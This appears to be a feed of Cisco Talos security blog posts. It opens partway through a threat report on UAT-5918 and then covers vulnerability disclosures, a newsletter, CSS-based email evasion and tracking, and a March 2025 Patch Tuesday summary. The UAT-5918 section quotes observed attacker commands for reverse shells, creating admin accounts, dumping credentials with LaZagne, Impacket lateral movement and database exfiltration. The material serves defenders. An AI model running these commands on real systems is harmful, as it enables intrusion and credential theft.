Furthermore, Talos has observed UAT-5918 execute reverse Meterpreter shells to maintain persistent access to the compromised hosts:

C:\\ProgramData\\bind.exe 

C:\\ProgramData\\microbind.exe 

C:\\ProgramData\\reverse.exe 

cmd /c C:/ProgramData/microbind.exe 

**Backdoored user account creation **

UAT-5918 regularly creates and assigns administrative privileges to user accounts they’ve created on compromised endpoints: 

net user <victimname\_username> <password> /add   
net localgroup administrators <username> /add   
net group domain admins <username> /add /domain 

Credential harvesting is a key tactic in UAT-5918 intrusions, instrumented via the use of tools such as Mimikatz, LaZagne, and browser credential stealers: 

**Mimikatz**: A commonly used credential extractor tool is run to obtain credentials from the endpoint:

**LaZagne**: LaZagne is an open-sourced credential extractor: 

C:/ProgramData/LaZagne.exe   
C:/ProgramData/LaZagne.exe -all >> laz.txt 

**Registry dumps**: The “reg” system command is used to take dumps of the SAM, SECURITY and SYSTEM hives:

**Google Chrome information**: The adversary also uses a tool called BrowserDataLite, a tool to extract Login information, cookies, and browsing history from web browsers. The extracted information is subsequently accessed via notepad\[.\]exe: 

BrowserDataLite\_x64.exe 

 C:\\Windows\\system32\\NOTEPAD.EXE Chrome\_LoginPass.txt   
C:\\Windows\\system32\\NOTEPAD.EXE Chrome\_Cookies.txt   
C:\\Windows\\system32\\NOTEPAD.EXE Chrome\_History.txt 

**SNETCracker**: A .NET-based password cracker (brute forcer) for services such as SSH, RDP, FTP, MySQL, SMPT, Telnet, VNC, etc.: 

Finding strings related to credentials such as: 

findstr /s /i /n /d:C:\\ password \*.conf 

**Pivoting to additional endpoints **

UAT-5918 consistently attempts to gain access to additional endpoints within the enterprise. They will perform network reconnaissance cyclically to discover new endpoints worth pivoting to and make attempts to gain access via RDP or Impacket: 

mstsc.exe -v <hostname> 

Impacket was also used on multiple occasions to pivot into additional endpoints and copy over tools: 

python wmiexec\[.\]py Administrator:<password>@<IP> -codec big5 1> \[\\\]\[\\\]127\[.\]0\[.\]0\[.\]1\\ADMIN$\\\_\_<timestamp> 2>&1 

 cmd\[.\]exe /Q /c echo python wmiexec\[.\]py Administrator:<password>@<IP> -codec big5 ^> \\\\<hostname>\\C$\\\_\_output 2^>^&1 > C:\\Windows\\jFcZpIUm\[.\]bat & C:\\Windows\\system32\\cmd\[.\]exe /Q /c C:\\Windows\\jFcZpIUm\[.\]bat & del C:\\Windows\\jFcZpIUm\[.\]bat 

 cmd\[.\]exe /Q /c net use \[\\\]\[\\\]<IP>\\c$ /user:<username> 1> \[\\\]\[\\\]127\[.\]0\[.\]0\[.\]1\\<share>\_\_ 2>&1   
cmd\[.\]exe /Q /c dir \[\\\]\\\[\\\]<IP>\\c$ 1> \[\\\]\[\\\]127\[.\]0\[.\]0\[.\]1\\<share>\_\_ 2>&1    
cmd\[.\]exe /Q /c copy fscan64\[.\]exe \[\\\]\[\\\]<IP>\\c$\\ 1> \[\\\]\[\\\]127\[.\]0\[.\]0\[.\]1\\<share>\_\_ 2>&1    
cmd\[.\]exe /Q /c copy \[\\\]\[\\\]<IP>\\c$\\<scan\_result>.txt 1> \[\\\]\[\\\]127\[.\]0\[.\]0\[.\]1\\<share>\_\_ 2>&1    
cmd\[.\]exe /Q /c copy fscan\[.\]exe \[\\\]\[\\\]<IP>\\c$\\ 1> \[\\\]\[\\\]127\[.\]0\[.\]0\[.\]1\\<share>\_\_ 2>&1    
cmd\[.\]exe /Q /c copy mimikatz\[.\]exe \[\\\]\[\\\]<IP>\\c$ 1> \[\\\]\[\\\]127\[.\]0\[.\]0\[.\]1\\<share>\_\_ 2>&1 

**File collection and staging **

UAT-5918 pivots across endpoints enumerating local and shared drives to find data of interest to the threat actor. This data may include everything that furthers the APT’s strategic and tactical goals and ranges from confidential documents, DB exports and backups to application configuration files. In one instance, the threat actor used the SQLCMD\[.\]exe utility to create a database backup that could be exfiltrated: 

C:/ProgramData/SQLCMD.EXE -S <target\_server\_DB> -U <username> -P <password> -Q BACKUP DATABASE <NAME> to disk='<db\_backup\_location>.bak' 

**Coverage **

Ways our customers can detect and block this threat are listed below. 

Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here.

Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here.

Cisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat.

Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products.

Cisco Secure Access is a modern cloud-delivered Security Service Edge (SSE) built on Zero Trust principles. Secure Access provides seamless transparent and secure access to the internet, cloud services or private application no matter where your users work. Please contact your Cisco account representative or authorized partner if you are interested in a free trial of Cisco Secure Access.

Umbrella, Cisco's secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network.

Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them.

Additional protections with context to your specific environment and threat data are available from the Firewall Management Center.

Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network.

Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.

**IOCs **

IOCs for this research can also be found at our GitHub repository here. 

6F6F7AA6144A1CFE61AC0A80DB7AD712440BDC5730644E05794876EB8B6A41B4 
BAB01D029556CF6290F6F21FEC5932E13399F93C5FDBCFFD3831006745F0EB83 
F7F6D0AFB300B57C32853D49FF50650F5D1DC7CF8111AA32FF658783C038BFE5 
497A326C6C207C1FB49E4DAD81D051FCF6BCBE047E0D3FE757C298EF8FE99ABA 
F9EB34C34E4A91630F265F12569F70B83FEBA039C861D6BF906B74E7FB308648 
DD832C8E30ED50383495D370836688EE48E95334270CBBCE41109594CB0C9FD1 
F7B52EE613F8D4E55A69F0B93AA9AA5472E453B0C458C8390DB963FF8B0B769C 
B994CBC1B5C905A2B731E47B30718C684521E8EC6AFB601AFECF30EF573E5153 
12D4EFE2B21B5053A3A21B49F25A6A4797DC6E9A80D511F29CA67039BA361F63 
2272925B1E83C7C3AB24BDEB82CE727DB84F5268C70744345CDA41B452C49E84 
71EB5115E8C47FFF1AB0E7ACEBAEA7780223683259A2BB1B8DB1EB3F26878CA4 
E159824448A8E53425B38BD11030AA786C460F956C9D7FC118B212E8CED4087A 
7EF22BFB6B2B2D23FE026BDFD7D2304427B6B62C6F9643EFEDDB4820EBF865AF 
EFC0D2C1E05E106C5C36160E17619A494676DEB136FB877C6D26F3ADF75A5777 
B7690c0fc9ec32e1a54663a2e5581e6260fe9318a565a475ee8a56c0638f38d0 
A774244ea5d759c4044aea75128a977e45fd6d1bb5942d9a8a1c5d7bff7e3db9 
31742ab79932af3649189b9287730384215a8dccdf21db50de320da7b3e16bb4 
09cea8aed5c58c446e6ef4d9bb83f7b5d7ba7b7c89d4164f397d378832722b69 
D47e35baee57eb692065a2295e3e9de40e4c57dba72cb39f9acb9f564c33b421 
1753fa34babeeee3b20093b72987b7f5e257270f86787c81a556790cb322c747 
F4ea99dc41cb7922d01955eef9303ec3a24b88c3318138855346de1e830ed09e 
5b0f8c650f54f17d002c01dcc74713a40eccb0367357d3f86490e9d17fcd71e8 
3588bda890ebf6138a82ae2e4f3cd7234ec071f343c9f5db5a96a54734eeaf9f 
95eee44482b4226efe3739bed3fa6ce7ae7db407c1e82e988f27cd27a31b56a6 
02ab315e4e3cf71c1632c91d4914c21b9f6e0b9aa0263f2400d6381aab759a61 
D1825cd7a985307c8585d88d247922c3a51835f9338dc76c10cdbad859900a03 
234899dea0a0e91c67c7172204de3a92a4cbeef37cdc10f563bf78343234ad1d 
8d440c5f0eca705c6d27aa4883c9cc4f8711de30fea32342d44a286b362efa9a 
Ffb8db57b543ba8a5086640a0b59a5def4929ad261e9f3624b2c0a22ae380391

UAT-5918 targets critical infrastructure entities in Taiwan

Cisco Talos’ Vulnerability Discovery & Research team recently disclosed a Miniaudio and three Adobe vulnerabilities.  
The vulnerabilities mentioned in this blog post have been patched by their respective vendors, all in adherence to Cisco’s third-party vulnerability disclosure policy.    
For Snort coverage

Thursday, March 13, 2025 14:23

Cisco Talos’ Vulnerability Discovery & Research team recently disclosed a Miniaudio and three Adobe vulnerabilities.  

The vulnerabilities mentioned in this blog post have been patched by their respective vendors, all in adherence to Cisco’s third-party vulnerability disclosure policy.    

For Snort coverage that can detect the exploitation of these vulnerabilities, download the latest rule sets from Snort.org, and our latest Vulnerability Advisories are always posted on Talos Intelligence’s website.     

**Miniaudio out-of-bounds write vulnerability **

_Discovered by Emmanuel Tacheau of Cisco Talos._   

TALOS-2024-2063 (CVE-2024-41147) is an out-of-bounds write vulnerability in Miniaudio, a lightweight, single-file audio playback and capture library written in C. A missing allocation size check can cause a buffer overflow, leading to this out-of-bounds write. This vulnerability can be triggered by a specially crafted FLAC file, resulting in a memory corruption when in playback mode. The application sends raw audio data to Miniaudio, which is then played back through the default playback device as defined by the operating system. 

**Adobe Acrobat out-of-bounds write vulnerability **

_Discovered by KPC of Cisco Talos._   

TALOS-2025-2134 (CVE-2025-27163) and TALOS-2025-2136 (CVE-2025-27164) are out-of-bounds read vulnerabilities in the font functionality, which can lead to disclosure of sensitive information. TALOS-2025-2135 (CVE-2025-27158) is a memory corruption vulnerability, stemming from an uninitialized pointer in the font functionality of Adobe Acrobat, which can potentially lead to arbitrary code execution. A specially crafted font file embedded into a PDF can trigger these vulnerabilities. An attacker needs to trick the user into opening a malicious file.

Miniaudio and Adobe Acrobat Reader vulnerabilities

Thorsten picks apart some headlines, highlights Talos’ report on an unknown attacker predominantly targeting Japan, and asks, “Where is the victim, and does it matter?”

Thursday, March 13, 2025 14:04

Welcome to this week’s edition of the Threat Source newsletter.

Let's pick up where we left off in my last newsletter. Please mark your calendars: The free support for Windows 10 will end on October 14, 2025.

When a software loses vendor support, it no longer receives patches or updates. As highlighted in my previous newsletter, the top method for initial access in the last quarter of 2024 was exploiting vulnerabilities in public-facing applications. While Windows 10 isn't typically (or shouldn't be) a public-facing application, unpatched client systems become prime targets for bad actors as they progress through the stages of an attack: Execution, Privilege Escalation, Defense Evasion, Credential Access, and Lateral Movement.

In last week’s newsletter, my colleague Martin asked, "Who is responsible, and does it matter?" As a thought exercise, let's flip the script and ask, "Where is the victim, and does it matter?" I often field questions about threats specific to countries, regions, or continents, but the reality is that software is largely the same regardless of physical location. Yes, there are different language packs, and yes, spam and phishing campaigns may use local languages. However, when it comes to software, operating systems, libraries, and drivers, we share code globally.

Remember Log4j and NotPetya? These vulnerabilities caused chaos around the globe. Both have CVEs listed in the Known Exploited Vulnerabilities (KEV) catalog, which is maintained by the Cybersecurity and Infrastructure Security Agency (CISA).

While researching the KEVs added in 2024, I discovered CVEs dating back to 2012, 2013, and 2014. This underscores that regardless of location, old vulnerabilities can remain relevant and dangerous years after their discovery.

Fast forward to 2025: CVE-2025-22224 was published on Mar. 4, 2025 and added to CISA's KEV Catalog less than two hours later. A week later, over 40,000 vulnerable instances were still detected globally, as shown on the Shadowserver dashboard:

Rather than solely focusing on geography, the global vulnerability landscape suggests we should ask ourselves:

·       "Am I running this software?"  
·       “Is my software up to date?"  
·       "How quickly can I fix it?"  
·       Or, for the brave, "Am I prepared to take the risk?"

While more attributes for CVEs may be beneficial, I personally believe the absence of a geographic attribute is a good thing. Patching and updating software should be prioritized regardless of nationality or geographic context. When it comes to maintaining robust cybersecurity, the only good vulnerability is no vulnerability.

Remember: In the digital world, we're all neighbors. A vulnerability anywhere is a threat just around the corner.

**The one big thing**

Cisco Talos discovered malicious activities conducted by an unknown attacker as early as January 2025, predominantly targeting organizations in Japan. The attacker exploited a vulnerability, CVE-2024-4577, a remote code execution (RCE) flaw in the PHP-CGI implementation of PHP on Windows, to gain initial access to victim machines.

**Why do I care?**

We reported an increasing trend of threat actors exploiting vulnerable public facing applications for initial access in our quarterly Talos Incident Response report for Q4 2024, and this intrusion highlights this ongoing activity. In this case, the attacker establishes persistence by modifying registry keys, adding scheduled tasks, and creating malicious services using the plugins of the Cobalt Strike kit called “TaoWu.”

**So now what?**

This vulnerability affects a common open-source component, third-party library, or a protocol used by different products. Please check with specific vendors for information on patching status. For more information, please see the National Vulnerability Database. Here are the Snort SIDs for this threat:

·       Snort 2: 64632, 64633, 64630, 64631  
·       Snort 3: 301157, 301156

**Top security headlines of the week**

· **The Bluetooth “backdoor” that wasn’t.** The original title, “Undocumented backdoor found in Bluetooth chip used by a billion devices,” was updated to a more precise description: “Undocumented commands found in Bluetooth chip used by a billion devices.” (Bleepingcomputer) (Darkmentor)

· **A ransomware gang leveraged a vulnerable IP camera in an attack, effectively circumventing Endpoint Detection and Response (EDR).** The “Mr. Monk” in me wants to point out that while the article title says “webcam” — which, in my definition, is a camera connected internally or via USB to a PC — the article discusses Linux and SMB shares, which suggests it is an IP camera.  (Bleepingcomputer)

· **Massive alleged cyber attack against X (formerly Twitter).** This past Monday, a series of outages left X unavailable for thousands of users for at least one hour. Not all details are currently known to the public. (Securityweek)

**Can’t get enough Talos?**

  
Cascading Style Sheets (CSS) are ever present in modern day web browsing, however it's far from their own use. Read our latest blog on Abusing with style: Leveraging cascading style sheets for evasion and tracking.

Cisco Talos discovered malicious activities conducted by an unknown attacker since as early as January 2025, predominantly targeting organizations in Japan. Read the full blog here: Unmasking the new persistent attacks on Japan

**Upcoming events where you can find Talos**

· DEVCORE (March 15, 2025) Taipei, Taiwan. Ashley Shen will give a talk on exploit hunting.  
· RSA (April 28-May 1, 2025)  San Francisco, CA  
· PIVOTcon (May 7-May 9, 2025) Malaga, Spain. Ashley Shen and Vitor Ventura will present "Redefining IABs: Impacts of Compartmentalization on Threat Tracking & Modeling."  
· CTA TIPS 2025 (May 14-15, 2025) Arlington, VA   
· Cisco Live U.S. (June 8 – 12, 2025) San Diego, CA 

**Most prevalent malware files from Talos telemetry over the past week**

SHA 256: 9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507  
MD5: 2915b3f8b703eb744fc54c81f4a9c67f  
VirusTotal: https://www.virustotal.com/gui/file/9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507  
Typical Filename: VID001.exe  
Claimed Product: N/A  
Detection Name: Win.Worm.Coinminer::1201

SHA 256: 9c60480afbbfbdf20520a9e7705f60a54ff2d0a94d72e4c26fc2aee55a158a9f  
MD5: 7abf12ab98f4cbed63228bba977cea7e  
VirusTotal:  https://www.virustotal.com/gui/file/9c60480afbbfbdf20520a9e7705f60a54ff2d0a94d72e4c26fc2aee55a158a9f  
Typical Filename: pdfzonepro.msi  
Claimed Product: N/A  
Detection Name: W32.9C60480AFB-95.SBX.TG

 SHA256: 47ecaab5cd6b26fe18d9759a9392bce81ba379817c53a3a468fe9060a076f8ca  
MD5: 71fea034b422e4a17ebb06022532fdde  
VirusTotal: https://www.virustotal.com/gui/file/47ecaab5cd6b26fe18d9759a9392bce81ba379817c53a3a468fe9060a076f8ca/details  
Typical Filename: VID001.exe  
Claimed Product: N/A  
Detection Name: Coinminer:MBT.26mw.in14.Talos

SHA 256: a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91  
MD5: 7bdbd180c081fa63ca94f9c22c457376  
VirusTotal: https://www.virustotal.com/gui/file/a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91  
Typical Filename: c0dwjdi6a.dll  
Claimed Product: N/A  
Detection Name: Trojan.GenericKD.33515991

Patch it up: Old vulnerabilities are everyone’s problems

Cascading Style Sheets (CSS) are ever present in modern day web browsing, however its far from their own use. This blog will detail the ways adversaries use CSS in email campaigns for evasion and tracking.

Thursday, March 13, 2025 06:00

*   Cisco Talos has identified actors abusing Cascading Style Sheets (CSS) to 1) evade spam filters and detection engines, and 2) track users’ actions and preferences. 
*   This blog is a follow-up to our previous report on how threat actors could abuse CSS using a technique called “hidden text salting” to evade spam filters, email parsers, and detection engines. This technique introduces several security implications. 
*   Additionally, we have observed the abuse of CSS for tracking, which impacts users’ privacy. This abuse ranges from tracking users’ actions to identifying their preferences. Although email clients restrict the execution of JavaScript, we argue that fingerprinting system and hardware configurations is also possible using CSS properties and rules, depending on the users’ clients and system configurations.

Cascading Style Sheets (CSS) specify how HTML materials are rendered and displayed to recipients. In a legitimate context, CSS is mainly used to adjust an email’s content to fit the screen resolution of the recipient. However, we will discuss how CSS can be abused by threat actors to stay under the radar and track recipients at a minimum. The features available in CSS allow attackers and spammers to track users’ actions and preferences, even though several features related to dynamic content (e.g., JavaScript) are restricted in email clients compared to web browsers. In what follows, we provide examples of CSS abuse we've identified in the wild for both evading detection and tracking users. These examples have all been observed from the second half of 2024 up until February 2025.

**The abuse of cascading style sheets for evasion**

Features of HTML and CSS can be used together to include comments and irrelevant content that are not visible to the victim (or recipient) when the email is rendered in an email client but can impact the efficacy of parsers and detection engines. We discussed a few examples in our recent blog post, and we will share more throughout the rest of this section. We will not cover cases that are well-known to the security community, such as including zero-sized fonts.

Threat actors can use the _text\_indent_ property of CSS to conceal content in the email’s body. Below is an example of a phishing email that contains text in different places, but the text is not visible when rendered in an email client.

A phishing email with several gibberish characters added in between the original words.

An inspection of the HTML source of the above email reveals that hidden text salting has been used in several places. For example, in the snippet shown below, the _text-indent_ and _font-size_ properties of CSS are used together to conceal the gibberish characters added in between the original words visible to the recipient of this email.

The HTML source snippet of the above phishing email shows how the __text-indent__ property in CSS is used to hide the irrelevant characters inserted between the original words visible to the recipient of email.

The _text-indent_ property is set to –_9999px_, which moves the text far out of the visible area when the email is rendered in the email client. Additionally, the _font-size_ property is set to an extremely small size, making the text virtually invisible to the human eye on most screens. In some cases, the text color is also set to _transparent_ to ensure the text is completely invisible by rendering it in a color that does not display against any background.

Alternatively, threat actors may use the _opacity_ property of CSS to hide the irrelevant content. An example phishing email is shown below that also impersonates the Blue Cross Blue Shield organization.

A phishing email impersonating the Blue Cross Blue Shield organization.

A close inspection of the HTML source of the above email reveals multiple attempts to conceal content, both in the body of the email and in the email’s preheader. Most email templates enable threat actors to add preheader text to their emails. Such text follows the email’s main subject immediately and is a technique that allows attackers to entice readers with additional information. Note that this field is also used in many email marketing and spam campaigns.

In this example, the attacker has set the _opacity_ property of CSS to zero, making the element fully transparent and invisible. Note that this preheader text is kept hidden by relying on multiple CSS properties, including _color_, _height_, _max-height_, and _max-width_. Additionally, the _mso-hide_ property is set to all to make the preheader invisible in Outlook email clients as well. Also, note that the invisible preheader text is completely irrelevant and appears benign (e.g., “FOUR yummy soup recipes just for you!”) to make it appear less suspicious to spam filters.

The HTML source snippet of the above phishing email shows how the __opacity__ property in CSS is used to hide the preheader text in the above email.

In a third example, the HTML smuggling technique is used to redirect the user to the final phishing page. This was a spear phishing email sent to one of our customers in February 2025. Additionally, the HTML attachment contains a series of German words and phrases that do not form coherent or grammatically correct sentences, and these are made invisible to the recipient of the email via hidden text salting.

A spear phishing email with an HTML attachment.

The email contains the phrase “with regard” in two other languages, including Finnish and Estonian. The rendered HTML attachment is also shown below. Note that the attacker tries to convince the recipient to click on the button and view the document by displaying a Microsoft SharePoint logo.

The rendered HTML attachment of the above email.

When the HTML attachment of the above email is inspected, one can notice that CSS properties are employed in various ways to conceal the irrelevant German phrases. First, the paragraphs' positions are set to _absolute_, allowing them to be placed anywhere on the page, which is often a technique used to hide elements by moving them off-screen. Additionally, the _width_ and _height_ of the paragraphs are set to zero, rendering them invisible in terms of space. The _opacity_ is also set to zero, making the content transparent and unseen by the recipient. Furthermore, a clipping method is utilized to ensure that the added salt remains hidden from the victim. Specifically, the first paragraph is clipped using a rectangle with the _clip_ CSS property (which is deprecated as of this writing) that has zero width and height, effectively making it invisible by limiting its visible area. The other paragraphs are clipped into circles using a more modern CSS property known as _clip-path_. Lastly, the _overflow_ property is set to _hidden_, ensuring that any content that exceeds the boundaries of the div element stays concealed.

The HTML source snippet of the above spear phishing email shows how hidden text salting is used to add irrelevant German phrases to the body of the email, while at the same time being invisible to the recipient.

**The abuse of cascading style sheets for tracking**

Email clients use different rendering engines and support different CSS rules and properties. However, CSS properties can be abused to track users' actions and preferences. We will discuss how fingerprinting recipients' systems and hardware is also possible, although some of these fingerprinting approaches may only work in specific email clients and depend on certain configuration assumptions.  

Marketing campaigns may use these CSS properties to track user engagement and optimize future campaigns, while spammers and threat actors may use this approach to enhance their targeted phishing campaigns, collect information, and craft targeted exploits. In what follows, we provide only a few examples of attempts to compromise the privacy of our customers.

Tracking users' (or email recipients') actions and preferences has been one of the most dominant patterns of CSS abuse identified by Talos in the wild in recent months. This abuse can range from identifying recipients' font and color scheme preferences and client language to even tracking their actions (e.g., viewing or printing emails). Below is an example of a spam email with multiple tracking capabilities.  

An example of a spam email.

The HTML source of the above email is shown below, where several tracking approaches are employed. First, the campaign uses a tracking image to record when the recipient opens the email. Second, different tracking URLs log the recipient's color scheme preference (see the _rd_ and _rl_ characters in the URLs). This is achievable via the CSS _media_ at-rule. Third, a tracking URL records when this email is printed (see the _p_ character in the URL). Finally, different tracking URLs are used to record when the email is opened in a specific email client. Also, note that a unique identifier is assigned to each recipient and used in the tracking URL.

The HTML source snippet of the above spam email shows how the recipient’s actions and preferences are tracked.

A second example email is shown below that tracks even more information, including the recipient's geo-location and device-specific information.

An example of a spam email.

An inspection of the HTML source of the above message, shown below, reveals several tracking clues. First, a tracking image is used to record when the recipient opens the email. Second, the recipient's color scheme preference is tracked via separate URLs. Third, a tracking URL is embedded within this message that records when it is printed. Fourth, different tracking URLs are used to record when the email is opened in a specific email client. Finally, a tracking pixel is appended to the end of the email to collect the recipient’s IP address, the email client used to open the email, and some device-specific information.

The HTML source snippet of the above spam email shows how the recipient’s actions and preferences are tracked and how their geo-location and device-specific information are collected.

As explained earlier, CSS provides a wide range of rules and properties that can help spammers and threat actors fingerprint users, their webmail or email client, and their system. For example, the _media_ at-rule can detect certain attributes of a user’s environment, including screen size, resolution, and color depth. The HTML code snippet below demonstrates how the CSS _media_ at-rule can be used for such purposes. Threat actors can set up different styles or load different resources based on criteria such as the screen width of the recipient’s device.

An example HTML code snippet that shows how the CSS __media__ at-rule can be used to fingerprint the screen width (or screen resolution) of the recipient’s device.

Fingerprinting the operating system of the recipient’s device is also possible and can be done in at least two main ways. In the first approach, the availability of certain fonts on a recipient’s system can indicate which operating system they might be using. Furthermore, threat actors may block the display of certain elements based on the inferred operating system. This can be achieved via the _font-face_ at-rule in CSS.

In the example shown below, the body of the message uses the _Segoe UI_ font, which is commonly available on Windows operating systems by default. Additionally, the _font-face_ at-rule defines a font called _MacFont_, which relies on the local availability of _Helvetica Neue_. This font is typically found on macOS systems. Note that in this example, elements with the class _.mac-style_ are hidden by default (_display: none;_). They are only shown to the recipient (_display: block;_) if the hypothetical media rule detects _MacFont_.

An example HTML code snippet that shows how the CSS __font-face__ at-rule can be used to fingerprint the operating system of the recipient’s device and then show or block specific contents using the availability of certain fonts.

The second method that can be used to fingerprint the operating system of a recipient’s device is to use unique URLs for resources (e.g., images) based on the applicable styles. When the email loads these resources, server logs can provide hints about the recipient's operating system. In the example snippet shown below, different images are loaded depending on the victim's operating system, which can be determined by the availability of certain fonts and styles that were applied.

An example HTML code snippet that shows how CSS can be used to fingerprint the operating system of the recipient’s device by loading different images.

**Mitigations**

As explained with multiple examples, CSS provides functionalities, rules, and properties that could be abused by attackers to evade spam filters and detection engines, as well as to track or fingerprint users and their devices. As such, both the security and privacy of your organization and business are at risk. In what follows, we provide a few mitigation solutions for each domain.

Security mitigations: One security mitigation solution is to rely on advanced filtering mechanisms that can more effectively detect hidden text salting and content concealment. These systems could examine different parts of emails to find and filter out hidden content. Alternatively, relying on features in addition to the text domain, such as the visual characteristics of emails, could be helpful. This approach is particularly beneficial in image-based threats.

Privacy mitigations: One of the most effective solutions in this domain is to use email privacy proxies. This mitigation is designed for email clients and involves rewriting emails to enhance privacy and maintain email integrity across different clients. In particular, the proxy service should be able to perform two main functions: 1) converting top-level CSS rules into style attributes, and 2) rewriting remote resources (e.g., images) to be included directly in the email via data URLs. The former function confines styles to the email itself and prevents conflicts with client-defined styles, while the latter function prevents exfiltration of information and undermines tracking pixels, ensuring the email's integrity over time.

**Protection**

Safeguarding against these complex threats necessitates a comprehensive email security solution that utilizes AI-driven detection. Secure Email Threat Defense employs distinctive deep learning and machine learning models, incorporating Natural Language Processing, within its sophisticated threat detection systems.

Secure Email Threat Defense detects harmful techniques employed in attacks against your organization, extracts unmatched context for particular business risks, offers searchable threat data, and classifies threats to identify which sectors of your organization are most at risk of attack.

Begin strengthening your environment against sophisticated threats. Register now for a free trial of Email Threat Defense.

Abusing with style: Leveraging cascading style sheets for evasion and tracking

Microsoft has released its monthly security update for March of 2025 which includes 57 vulnerabilities affecting a range of products, including 6 that Microsoft marked as “critical”.

Tuesday, March 11, 2025 17:55

Microsoft has released its monthly security update for March of 2025 which includes 57 vulnerabilities affecting a range of products, including 6 that Microsoft marked as “critical”. 

There are six vulnerabilities that Microsoft has observed being exploited in the wild. CVE-2025-26633 is a Remoted Code Execution (RCE) vulnerability in Microsoft’s Management Console. Two information disclosure vulnerabilities, CVE-2025-24984 and CVE-2025-24991, and one RCE vulnerability, CVE-2025-24993, in Windows NTFS were observed being exploited in the wild. Microsoft also patched, CVE-2025-24985, another RCE exploited in the wild in the Windows Fast FAT system driver. An Elevation of Privilege (EOP) vulnerability, CVE-2025-24983, was also discovered being exploited in the wild, in Windows’ win32 Kernel Subsystem. 

There are two notable "critical" vulnerabilities. The first is CVE-2025-24035, which is a remote code execution (RCE) vulnerability affecting the Windows Remote Desktop Gateway (RD Gateway) service. This vulnerability is a remote unauthenticated User-after-free (UAF) issue in handling websocket initialization and closing operations which could potentially result in arbitrary code execution in the RD Gateway process. Successful exploitation of this vulnerability requires the attacker to connect to a system with the RD Gateway role. CVE-2025-24035 has been assigned a CVSS 3.1 score of 8.1 and is considered “more likely to be exploited” by Microsoft. 

CVE-2025-24045 is another critical remote code execution vulnerability in the RD Gateway service caused by a UAF issue in handling connection and disconnection callbacks. Successful exploitation of this vulnerability requires the attacker to connect to a system with the RD Gateway role. This vulnerability has also been assigned a CVSS 3.1 score of 8.1 and is considered “more likely to be exploited” by Microsoft. 

CVE-2024-9157 is an elevation of privilege vulnerability in a Synaptics Audio Effect Component service binaries DLL distributed with Windows Update. This vulnerability is caused by the Synaptics service opening a named pipe without any meaningful ACLs and expecting clients to provide the name of a DLL which is then loaded into the Synaptics process, which may allow even a remote unprivileged user to provide a malicious DLL to be loaded in the context of the service. This vulnerability has been assigned a CVSS 3.1 score of 9.9 and is considered “more likely to be exploited” by Microsoft. 

CVE-2025-24064 is an RCE vulnerability in the Windows Domain Name Service flagged as "critical” by Microsoft.  To successfully exploit this vulnerability an attacker needs to send a perfectly timed DNS update message to the vulnerable server which may cause a UAF error and could potentially lead to remote code execution. This vulnerability has been assigned a CVSS 3.1 score of 8.1 and is considered "less likely to be exploited” by Microsoft. 

CVE-2025-24084 is an RCE in the Windows Subsystem for Linux (WSL2) Kernel caused by an untrusted pointer dereference. To exploit this vulnerability an attacker needs to have elevated privileges on the target machine, due to the requirement of manipulating processes, which isn’t usually accessible by regular users. This vulnerability has been assigned a CVSS 3.1 score of 8.4 but was considered "less likely to be exploited” by Microsoft. 

CVE-2025-26645 is a vulnerability in the Remote Desktop (RDP) client caused by a relative path traversal issue. An attacker in control of a Remote Desktop Server could achieve RCE on any vulnerable client machine connecting to the service. This vulnerability has been assigned a CVSS 3.1 score of 8.8 and is considered "less likely to be exploited” by Microsoft. 

Talos would also like to highlight the following vulnerabilities that Microsoft considers to be “important” or "Critical”:     

*   CVE-2025-24057 Microsoft Office Remote Code Execution Vulnerability 
*   CVE-2025-24051 Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability 
*   CVE-2025-24056 Windows Telephony Service Remote Code Execution Vulnerability 

A complete list of all the other vulnerabilities Microsoft disclosed this month is available on its update page. 

In response to these vulnerability disclosures, Talos is releasing a new Snort rule set that detects attempts to exploit some of them. Please note that additional rules may be released at a future date and current rules are subject to change pending additional information. Cisco Security Firewall customers should use the latest update to their ruleset by updating their SRU. Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.   

The rules included in this release that protect against the exploitation of many of these vulnerabilities are 64663, 64662, 64432, 64658, 64659, 64656, 64657, 64660, 64661, 64653, 64652. There are also these Snort 3 rules: 64432, 301166, 301164, 301163, 301165, 301162